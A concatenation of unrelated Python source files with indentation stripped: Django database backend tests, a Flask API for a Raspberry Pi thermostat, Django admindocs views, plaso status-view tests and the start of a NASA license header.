models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), (u'Clark', u'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [(u'Jane', u'Doe'), (u'John', u'Doe')])
self.assertEqual(list(cursor.fetchall()), [(u'Mary', u'Agnelline'), (u'Peter', u'Parker')])
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
finally:
transaction.rollback()
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
connections_set = set()
connection.cursor()
connections_set.add(connection.connection)
def runner():
from django.db import connection
connection.cursor()
connections_set.add(connection.connection)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_set), 3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection.connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
connections_set = set()
for conn in connections.all():
connections_set.add(conn)
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_set.add(conn)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_set), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except DatabaseError as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(len(exceptions), 0)
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class BackendLoadingTests(TestCase):
def test_old_style_backends_raise_useful_exception(self):
self.assertRaisesRegexp(ImproperlyConfigured,
"Try using django.db.backends.sqlite3 instead",
load_backend, 'sqlite3')
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for automatic primary key.
"""
@skipIfDBFeature('allows_primary_key_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
|
|
"""RESTful HTTP API for controlling a Raspberry Pi thermostat. API endpoints define setpoints for 8 3hr time intervals
throughout a 24hr day: 0-3, 3-6, 6-9, etc. Additionally, the user may override the scheduled setpoint for the next 3 hours.
Includes built-in hysteresis to avoid rapid on-off switching of HVAC systems; this hysteresis is not exposed in the API
for safety reasons.
"""
import collections
import datetime
import conf
import flask
import flask.json
from flask import request
import logging
import time
import os
import rpi_relay
import state
import Queue
import werkzeug.exceptions
from apscheduler.schedulers.background import BackgroundScheduler
app = flask.Flask(__name__)
# Temperature setpoint is determined by the time of day, stored in SETPOINT_DB.
TEMP_SETPOINT_HOURS = (0, 3, 6, 9, 12, 15, 18, 21)
def get_request_db():
"Returns a dbm database. Use only in a Flask app context!"
db = getattr(flask.g, '_database', None)
if db is None:
# open a new connection as needed -- throughput doesn't need to be high for this!
db = flask.g._database = state.get_conn()
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(flask.g, '_database', None)
if db is not None:
db.close()
def to_farenheit(c):
return 9.0/5.0 * c + 32
def get_setpoint(hour, db=None):
"Returns the temp setpoint for the given hour of day"
if db is None:
db = get_request_db()
setpoint_key = [set_hr for set_hr in TEMP_SETPOINT_HOURS if hour >= set_hr][-1]
return db[setpoint_key]
def parse_setpoints(json_form):
form = flask.json.loads(json_form['setpoints'])
setpoints = {}
for setpoint, val in form.iteritems():
if isinstance(setpoint, basestring):
setpoint = int(setpoint)
if isinstance(val, basestring):
val = float(val)
if setpoint in TEMP_SETPOINT_HOURS:
setpoints[setpoint] = val
else:
raise Exception("setpoint %s not valid" % setpoint)
return setpoints
@app.route('/api/v1/setpoints/', methods=('POST', 'GET'))
def handle_setpoints_request():
db = get_request_db()
if request.method == 'POST':
setpoints = parse_setpoints(request.form)
for hr, temp in setpoints.iteritems():
db[hr] = temp
return flask.json.jsonify(setpoints)
if request.method == 'GET':
setpoints = {hr: db.get(hr) for hr in TEMP_SETPOINT_HOURS}
return flask.json.jsonify(setpoints)
@app.route('/api/v1/status/', methods=('GET',))
def return_relay_status():
return flask.json.jsonify({'ac_on': rpi_relay.ac_status()})
@app.route('/api/v1/mode/', methods=('GET', 'POST'))
def handle_thermostat_mode():
if request.method == 'GET':
return flask.json.jsonify({'mode': state.CURRENT_MODE})
if request.method == 'POST':
mode = request.form.get('mode')
assert mode in [state.ThermostatModes.AUTO, state.ThermostatModes.MANUAL, state.ThermostatModes.OFF]
state.CURRENT_MODE = mode
return flask.json.jsonify({'mode': state.CURRENT_MODE})
@app.route('/api/v1/temperature/', methods=('POST', 'GET'))
def handle_temp():
logger.info('in temperature')
if request.method == 'POST':
logger.warn(request.form)
temp = float(request.form.get('temperature'))
if conf.FARENHEIT is True:
temp = to_farenheit(temp)
humidity = float(request.form.get('humidity'))
logger.warn('temp=%s, humidity=%s' % (temp, humidity))
now = time.time()
state.TEMPERATURE_READINGS.append((now, temp))
state.HUMIDITY_READINGS.append((now, humidity))
return 'ok'
if request.method == 'GET':
temperatures = [x for x in state.TEMPERATURE_READINGS]
humidities = [x for x in state.HUMIDITY_READINGS]
return flask.json.jsonify(dict(temperature=temperatures, humidity=humidities))
@app.route('/api/v1/timer/', methods=('POST', 'GET'))
def handle_timer_request():
"""manual override for turning the AC on for a set amount of time."""
def get_manual_status():
if state.EVENT_QUEUE.queue:
now = time.time()
future_events = filter(lambda x: x[0] > now, state.EVENT_QUEUE.queue)
if future_events:
future_e, status = future_events[0]
return flask.json.jsonify(dict(future_sec=(future_e - now), future_status=status))
return flask.json.jsonify({})
def handle_timer(on_time):
if (on_time < conf.MIN_ON_TIME) or (on_time > conf.MAX_ON_TIME):
raise werkzeug.exceptions.BadRequest(description='time_on exceeds valid params')
turn_off_event = (time.time() + on_time, False)
turn_on_event = (time.time(), True)
new_queue = Queue.PriorityQueue()
new_queue.put(turn_on_event)
new_queue.put(turn_off_event)
state.EVENT_QUEUE = new_queue
if request.method == 'POST':
on_time_int = int(request.form['on_time'])
handle_timer(on_time_int)
return get_manual_status()
if request.method == 'GET':
return get_manual_status()
def event_handler():
logger = logging.getLogger('task_queue')
q = state.EVENT_QUEUE
conn = state.get_conn()
try:
exec_time, event = q.get(block=False)
now = time.time()
if now > exec_time:
rpi_relay.set_ac_relay(event, conn)
logger.info("setting relay=%s" % event)
else:
# put the event back into the queue if it isn't time to execute it yet
q.put((exec_time, event))
q.task_done()
except Queue.Empty:
pass
def bangbang_controller():
def is_stale(timestamp):
if time.time() - int(timestamp) > state.STALE_READ_INTERVAL:
return True
return False
logger = logging.getLogger('bangbang_controller')
if state.CURRENT_MODE != state.ThermostatModes.AUTO:
logger.warn("mode is set to %s" % state.CURRENT_MODE)
return
conn = state.get_conn()
temp_read_time, most_recent_temp = state.TEMPERATURE_READINGS[-1]
humid_read_time, most_recent_humidity = state.HUMIDITY_READINGS[-1]
if is_stale(temp_read_time) or is_stale(humid_read_time):
state.CURRENT_MODE = state.ThermostatModes.MANUAL
logger.error("temperature readings are stale! setting mode to MANUAL")
return
now = datetime.datetime.now()
current_setpoint = get_setpoint(now.hour, db=conn)
if (most_recent_temp - current_setpoint) > (conf.HYSTERESIS_TEMP / 2.0):
turn_on_event = (time.time(), True)
state.EVENT_QUEUE.put(turn_on_event)
if rpi_relay.ac_status() is False:
logger.warn('Temp=%s, setpoint=%s, Setting AC ON' % (most_recent_temp, current_setpoint))
elif (current_setpoint - most_recent_temp) > (conf.HYSTERESIS_TEMP / 2.0):
turn_off_event = (time.time(), False)
state.EVENT_QUEUE.put(turn_off_event)
if rpi_relay.ac_status() is True:
logger.warn('Temp=%s, setpoint=%s, Setting AC OFF' % (most_recent_temp, current_setpoint))
@app.route('/<path:path>/')
def resources(path):
return flask.send_from_directory(STATIC_DIR, path)
@app.route('/')
def index():
return flask.send_file('static/index.html')
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(levelname)s - %(asctime)s %(message)s')
logger = logging.getLogger('main')
STATIC_DIR = os.environ.get('STATIC_DIR', 'static')
rpi_relay.init_RPi()
scheduler = BackgroundScheduler()
scheduler.start()
scheduler.add_job(event_handler, 'interval', seconds=conf.EVENT_LOOP_INTERVAL)
scheduler.add_job(bangbang_controller, 'interval', seconds=conf.BANGBANG_LOOP_INTERVAL)
logger.warn('starting scheduler')
logger.warn('starting web server')
app.run(debug=False, host='0.0.0.0')
|
|
import inspect
import os
import re
from importlib import import_module
from django.apps import apps
from django.conf import settings
from django.contrib import admin
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.admindocs import utils
from django.core import urlresolvers
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.db import models
from django.http import Http404
from django.template.base import (
InvalidTemplateLibrary, builtins, get_library, get_templatetags_modules,
libraries,
)
from django.template.engine import Engine
from django.utils._os import upath
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView
# Exclude methods starting with these strings from documentation
MODEL_METHODS_EXCLUDE = ('_', 'add_', 'delete', 'save', 'set_')
class BaseAdminDocsView(TemplateView):
"""
Base view for admindocs views.
"""
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
if not utils.docutils_is_available:
# Display an error message for people without docutils
self.template_name = 'admin_doc/missing_docutils.html'
return self.render_to_response(admin.site.each_context(request))
return super(BaseAdminDocsView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
kwargs.update({'root_path': urlresolvers.reverse('admin:index')})
kwargs.update(admin.site.each_context(self.request))
return super(BaseAdminDocsView, self).get_context_data(**kwargs)
class BookmarkletsView(BaseAdminDocsView):
template_name = 'admin_doc/bookmarklets.html'
def get_context_data(self, **kwargs):
context = super(BookmarkletsView, self).get_context_data(**kwargs)
context.update({
'admin_url': "%s://%s%s" % (
self.request.scheme, self.request.get_host(), context['root_path'])
})
return context
class TemplateTagIndexView(BaseAdminDocsView):
template_name = 'admin_doc/template_tag_index.html'
def get_context_data(self, **kwargs):
load_all_installed_template_libraries()
tags = []
app_libs = list(libraries.items())
builtin_libs = [(None, lib) for lib in builtins]
for module_name, library in builtin_libs + app_libs:
for tag_name, tag_func in library.tags.items():
title, body, metadata = utils.parse_docstring(tag_func.__doc__)
if title:
title = utils.parse_rst(title, 'tag', _('tag:') + tag_name)
if body:
body = utils.parse_rst(body, 'tag', _('tag:') + tag_name)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'tag', _('tag:') + tag_name)
if library in builtins:
tag_library = ''
else:
tag_library = module_name.split('.')[-1]
tags.append({
'name': tag_name,
'title': title,
'body': body,
'meta': metadata,
'library': tag_library,
})
kwargs.update({'tags': tags})
return super(TemplateTagIndexView, self).get_context_data(**kwargs)
class TemplateFilterIndexView(BaseAdminDocsView):
template_name = 'admin_doc/template_filter_index.html'
def get_context_data(self, **kwargs):
load_all_installed_template_libraries()
filters = []
app_libs = list(libraries.items())
builtin_libs = [(None, lib) for lib in builtins]
for module_name, library in builtin_libs + app_libs:
for filter_name, filter_func in library.filters.items():
title, body, metadata = utils.parse_docstring(filter_func.__doc__)
if title:
title = utils.parse_rst(title, 'filter', _('filter:') + filter_name)
if body:
body = utils.parse_rst(body, 'filter', _('filter:') + filter_name)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'filter', _('filter:') + filter_name)
if library in builtins:
tag_library = ''
else:
tag_library = module_name.split('.')[-1]
filters.append({
'name': filter_name,
'title': title,
'body': body,
'meta': metadata,
'library': tag_library,
})
kwargs.update({'filters': filters})
return super(TemplateFilterIndexView, self).get_context_data(**kwargs)
class ViewIndexView(BaseAdminDocsView):
template_name = 'admin_doc/view_index.html'
def get_context_data(self, **kwargs):
views = []
urlconf = import_module(settings.ROOT_URLCONF)
view_functions = extract_views_from_urlpatterns(urlconf.urlpatterns)
for (func, regex, namespace, name) in view_functions:
views.append({
'full_name': '%s.%s' % (func.__module__, getattr(func, '__name__', func.__class__.__name__)),
'url': simplify_regex(regex),
'url_name': ':'.join((namespace or []) + (name and [name] or [])),
'namespace': ':'.join((namespace or [])),
'name': name,
})
kwargs.update({'views': views})
return super(ViewIndexView, self).get_context_data(**kwargs)
class ViewDetailView(BaseAdminDocsView):
template_name = 'admin_doc/view_detail.html'
def get_context_data(self, **kwargs):
view = self.kwargs['view']
urlconf = urlresolvers.get_urlconf()
if urlresolvers.get_resolver(urlconf)._is_callback(view):
mod, func = urlresolvers.get_mod_func(view)
view_func = getattr(import_module(mod), func)
else:
raise Http404
title, body, metadata = utils.parse_docstring(view_func.__doc__)
if title:
title = utils.parse_rst(title, 'view', _('view:') + view)
if body:
body = utils.parse_rst(body, 'view', _('view:') + view)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'model', _('view:') + view)
kwargs.update({
'name': view,
'summary': title,
'body': body,
'meta': metadata,
})
return super(ViewDetailView, self).get_context_data(**kwargs)
class ModelIndexView(BaseAdminDocsView):
template_name = 'admin_doc/model_index.html'
def get_context_data(self, **kwargs):
m_list = [m._meta for m in apps.get_models()]
kwargs.update({'models': m_list})
return super(ModelIndexView, self).get_context_data(**kwargs)
class ModelDetailView(BaseAdminDocsView):
template_name = 'admin_doc/model_detail.html'
def get_context_data(self, **kwargs):
model_name = self.kwargs['model_name']
# Get the model class.
try:
app_config = apps.get_app_config(self.kwargs['app_label'])
except LookupError:
raise Http404(_("App %(app_label)r not found") % self.kwargs)
try:
model = app_config.get_model(model_name)
except LookupError:
raise Http404(_("Model %(model_name)r not found in app %(app_label)r") % self.kwargs)
opts = model._meta
title, body, metadata = utils.parse_docstring(model.__doc__)
if title:
title = utils.parse_rst(title, 'model', _('model:') + model_name)
if body:
body = utils.parse_rst(body, 'model', _('model:') + model_name)
# Gather fields/field descriptions.
fields = []
for field in opts.fields:
# ForeignKey is a special case since the field will actually be a
# descriptor that returns the other object
if isinstance(field, models.ForeignKey):
data_type = field.remote_field.model.__name__
app_label = field.remote_field.model._meta.app_label
verbose = utils.parse_rst(
(_("the related `%(app_label)s.%(data_type)s` object") % {
'app_label': app_label, 'data_type': data_type,
}),
'model',
_('model:') + data_type,
)
else:
data_type = get_readable_field_data_type(field)
verbose = field.verbose_name
fields.append({
'name': field.name,
'data_type': data_type,
'verbose': verbose,
'help_text': field.help_text,
})
# Gather many-to-many fields.
for field in opts.many_to_many:
data_type = field.remote_field.model.__name__
app_label = field.remote_field.model._meta.app_label
verbose = _("related `%(app_label)s.%(object_name)s` objects") % {
'app_label': app_label,
'object_name': data_type,
}
fields.append({
'name': "%s.all" % field.name,
"data_type": 'List',
'verbose': utils.parse_rst(_("all %s") % verbose, 'model', _('model:') + opts.model_name),
})
fields.append({
'name': "%s.count" % field.name,
'data_type': 'Integer',
'verbose': utils.parse_rst(_("number of %s") % verbose, 'model', _('model:') + opts.model_name),
})
# Gather model methods.
for func_name, func in model.__dict__.items():
if (inspect.isfunction(func) and len(inspect.getargspec(func)[0]) == 1):
try:
for exclude in MODEL_METHODS_EXCLUDE:
if func_name.startswith(exclude):
raise StopIteration
except StopIteration:
continue
verbose = func.__doc__
if verbose:
verbose = utils.parse_rst(utils.trim_docstring(verbose), 'model', _('model:') + opts.model_name)
fields.append({
'name': func_name,
'data_type': get_return_data_type(func_name),
'verbose': verbose,
})
# Gather related objects
for rel in opts.related_objects:
verbose = _("related `%(app_label)s.%(object_name)s` objects") % {
'app_label': rel.related_model._meta.app_label,
'object_name': rel.related_model._meta.object_name,
}
accessor = rel.get_accessor_name()
fields.append({
'name': "%s.all" % accessor,
'data_type': 'List',
'verbose': utils.parse_rst(_("all %s") % verbose, 'model', _('model:') + opts.model_name),
})
fields.append({
'name': "%s.count" % accessor,
'data_type': 'Integer',
'verbose': utils.parse_rst(_("number of %s") % verbose, 'model', _('model:') + opts.model_name),
})
kwargs.update({
'name': '%s.%s' % (opts.app_label, opts.object_name),
'summary': title,
'description': body,
'fields': fields,
})
return super(ModelDetailView, self).get_context_data(**kwargs)
class TemplateDetailView(BaseAdminDocsView):
template_name = 'admin_doc/template_detail.html'
def get_context_data(self, **kwargs):
template = self.kwargs['template']
templates = []
try:
default_engine = Engine.get_default()
except ImproperlyConfigured:
# Non-trivial TEMPLATES settings aren't supported (#24125).
pass
else:
# This doesn't account for template loaders (#24128).
for index, directory in enumerate(default_engine.dirs):
template_file = os.path.join(directory, template)
templates.append({
'file': template_file,
'exists': os.path.exists(template_file),
'contents': lambda: open(template_file).read() if os.path.exists(template_file) else '',
'order': index,
})
kwargs.update({
'name': template,
'templates': templates,
})
return super(TemplateDetailView, self).get_context_data(**kwargs)
####################
# Helper functions #
####################
def load_all_installed_template_libraries():
# Load/register all template tag libraries from installed apps.
for module_name in get_templatetags_modules():
mod = import_module(module_name)
if not hasattr(mod, '__file__'):
# e.g. packages installed as eggs
continue
try:
libraries = [
os.path.splitext(p)[0]
for p in os.listdir(os.path.dirname(upath(mod.__file__)))
if p.endswith('.py') and p[0].isalpha()
]
except OSError:
continue
else:
for library_name in libraries:
try:
get_library(library_name)
except InvalidTemplateLibrary:
pass
def get_return_data_type(func_name):
"""Return a somewhat-helpful data type given a function name"""
if func_name.startswith('get_'):
if func_name.endswith('_list'):
return 'List'
elif func_name.endswith('_count'):
return 'Integer'
return ''
def get_readable_field_data_type(field):
"""Returns the description for a given field type, if it exists,
Fields' descriptions can contain format strings, which will be interpolated
against the values of field.__dict__ before being output."""
return field.description % field.__dict__
def extract_views_from_urlpatterns(urlpatterns, base='', namespace=None):
"""
Return a list of views from a list of urlpatterns.
Each object in the returned list is a two-tuple: (view_func, regex)
"""
views = []
for p in urlpatterns:
if hasattr(p, 'url_patterns'):
try:
patterns = p.url_patterns
except ImportError:
continue
views.extend(extract_views_from_urlpatterns(
patterns,
base + p.regex.pattern,
(namespace or []) + (p.namespace and [p.namespace] or [])
))
elif hasattr(p, 'callback'):
try:
views.append((p.callback, base + p.regex.pattern,
namespace, p.name))
except ViewDoesNotExist:
continue
else:
raise TypeError(_("%s does not appear to be a urlpattern object") % p)
return views
named_group_matcher = re.compile(r'\(\?P(<\w+>).+?\)')
non_named_group_matcher = re.compile(r'\(.*?\)')
def simplify_regex(pattern):
"""
Clean up urlpattern regexes into something somewhat readable by Mere Humans:
turns something like "^(?P<sport_slug>\w+)/athletes/(?P<athlete_slug>\w+)/$"
into "<sport_slug>/athletes/<athlete_slug>/"
"""
# handle named groups first
pattern = named_group_matcher.sub(lambda m: m.group(1), pattern)
# handle non-named groups
pattern = non_named_group_matcher.sub("<var>", pattern)
# clean up any outstanding regex-y characters.
pattern = pattern.replace('^', '').replace('$', '').replace('?', '').replace('//', '/').replace('\\', '')
if not pattern.startswith('/'):
pattern = '/' + pattern
return pattern
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the status view."""
from __future__ import unicode_literals
import unittest
try:
import mock # pylint: disable=import-error
except ImportError:
from unittest import mock
import sys
from dfvfs.lib import definitions as dfvfs_definitions
import plaso
from plaso.cli import status_view
from plaso.engine import processing_status
from tests.cli import test_lib
class StatusViewTest(test_lib.CLIToolTestCase):
"""Tests for the status view."""
# pylint: disable=protected-access
def _MockTime(self):
"""Mock function to simulate time.time()
Returns:
int: stored time via self._mocked_time"""
return self._mocked_time
def setUp(self):
"""Makes preparations before running an individual test."""
self.mock_time = mock.patch(
'plaso.cli.status_view.time.time', self._MockTime)
self._mocked_time = 0
self.mock_time.start()
def tearDown(self):
"""Cleans up after running an individual test."""
self.mock_time.stop()
def _CheckOutput(self, output, expected_output):
"""Compares the output against the expected output.
The actual processing time is ignored, since it can vary.
Args:
output (str): tool output.
expected_output (list[str]): expected tool output.
"""
output = output.split('\n')
self.assertEqual(output[:4], expected_output[:4])
self.assertTrue(output[4].startswith('Processing time\t\t: '))
self.assertEqual(output[5:], expected_output[5:])
# TODO: add tests for _ClearScreen
# TODO: add tests for _FormatAnalysisStatusTableRow
# TODO: add tests for _FormatExtractionStatusTableRow
# TODO: add tests for _FormatSizeInUnitsOf1024
# TODO: add tests for _PrintAnalysisStatusHeader
# TODO: add tests for _PrintAnalysisStatusUpdateLinear
# TODO: add tests for _PrintAnalysisStatusUpdateWindow
# TODO: add tests for _PrintEventsStatus
def testPrintExtractionStatusUpdateLinear(self):
"""Tests the PrintExtractionStatusUpdateLinear function."""
output_writer = test_lib.TestOutputWriter()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
process_status = processing_status.ProcessingStatus()
process_status.UpdateForemanStatus(
'f_identifier', 'f_status', 123, 0,
'f_test_file', 1, 29, 3, 456, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateLinear(process_status)
expected_output = (
'Processing time: 00:00:00\n'
'f_identifier (PID: 123) status: f_status, events produced: 456, '
'file: f_test_file\n'
'\n')
output = output_writer.ReadOutput()
self.assertEqual(output, expected_output)
process_status.UpdateWorkerStatus(
'w_identifier', 'w_status', 123, 0,
'w_test_file', 1, 2, 3, 4, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateLinear(process_status)
expected_output = (
'Processing time: 00:00:00\n'
'f_identifier (PID: 123) status: f_status, events produced: 456, '
'file: f_test_file\n'
'w_identifier (PID: 123) status: w_status, events produced: 4, '
'file: w_test_file\n'
'\n')
output = output_writer.ReadOutput()
self.assertEqual(output, expected_output)
def testPrintExtractionStatusUpdateWindow(self):
"""Tests the _PrintExtractionStatusUpdateWindow function."""
output_writer = test_lib.TestOutputWriter()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
process_status = processing_status.ProcessingStatus()
process_status.UpdateForemanStatus(
'f_identifier', 'f_status', 123, 0,
'f_test_file', 1, 29, 3, 456, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateWindow(process_status)
table_header = (
'Identifier '
'PID '
'Status '
'Memory '
'Sources '
'Events '
'File')
if not sys.platform.startswith('win'):
table_header = '\x1b[1m{0:s}\x1b[0m'.format(table_header)
expected_output = [
'plaso - test_tool version {0:s}'.format(plaso.__version__),
'',
'Source path\t\t: /test/source/path',
'Source type\t\t: directory',
'Processing time\t\t: 00:00:00',
'',
table_header,
('f_identifier '
'123 '
'f_status '
'0 B '
'29 (29) '
'456 (456) '
'f_test_file'),
'',
'']
output = output_writer.ReadOutput()
self._CheckOutput(output, expected_output)
process_status.UpdateWorkerStatus(
'w_identifier', 'w_status', 123, 0,
'w_test_file', 1, 2, 3, 4, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateWindow(process_status)
expected_output = [
'plaso - test_tool version {0:s}'.format(plaso.__version__),
'',
'Source path\t\t: /test/source/path',
'Source type\t\t: directory',
'Processing time\t\t: 00:00:00',
'',
table_header,
('f_identifier '
'123 '
'f_status '
'0 B '
'29 (29) '
'456 (456) '
'f_test_file'),
('w_identifier '
'123 '
'w_status '
'0 B '
'2 (2) '
'4 (4) '
'w_test_file'),
'',
'']
output = output_writer.ReadOutput()
self._CheckOutput(output, expected_output)
def testFormatProcessingTime(self):
"""Tests the _FormatProcessingTime function."""
output_writer = test_lib.TestOutputWriter()
process_status = processing_status.ProcessingStatus()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
process_status.start_time = 0
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '00:00:00')
self._mocked_time = 12 * 60 * 60 + 31 * 60 +15
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '12:31:15')
self._mocked_time = 24 * 60 * 60
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '1 day, 00:00:00')
self._mocked_time = 5 * 24 * 60 * 60 + 5 * 60 * 60 + 61
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '5 days, 05:01:01')
# TODO: add tests for _PrintTasksStatus
# TODO: add tests for GetAnalysisStatusUpdateCallback
# TODO: add tests for GetExtractionStatusUpdateCallback
# TODO: add tests for PrintAnalysisReportsDetails
def testPrintExtractionStatusHeader(self):
"""Tests the PrintExtractionStatusHeader function."""
output_writer = test_lib.TestOutputWriter()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
test_view.PrintExtractionStatusHeader(None)
# TODO: add tests for PrintExtractionSummary
# TODO: add tests for SetMode
# TODO: add tests for SetSourceInformation
# TODO: add tests for SetStorageFileInformation
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
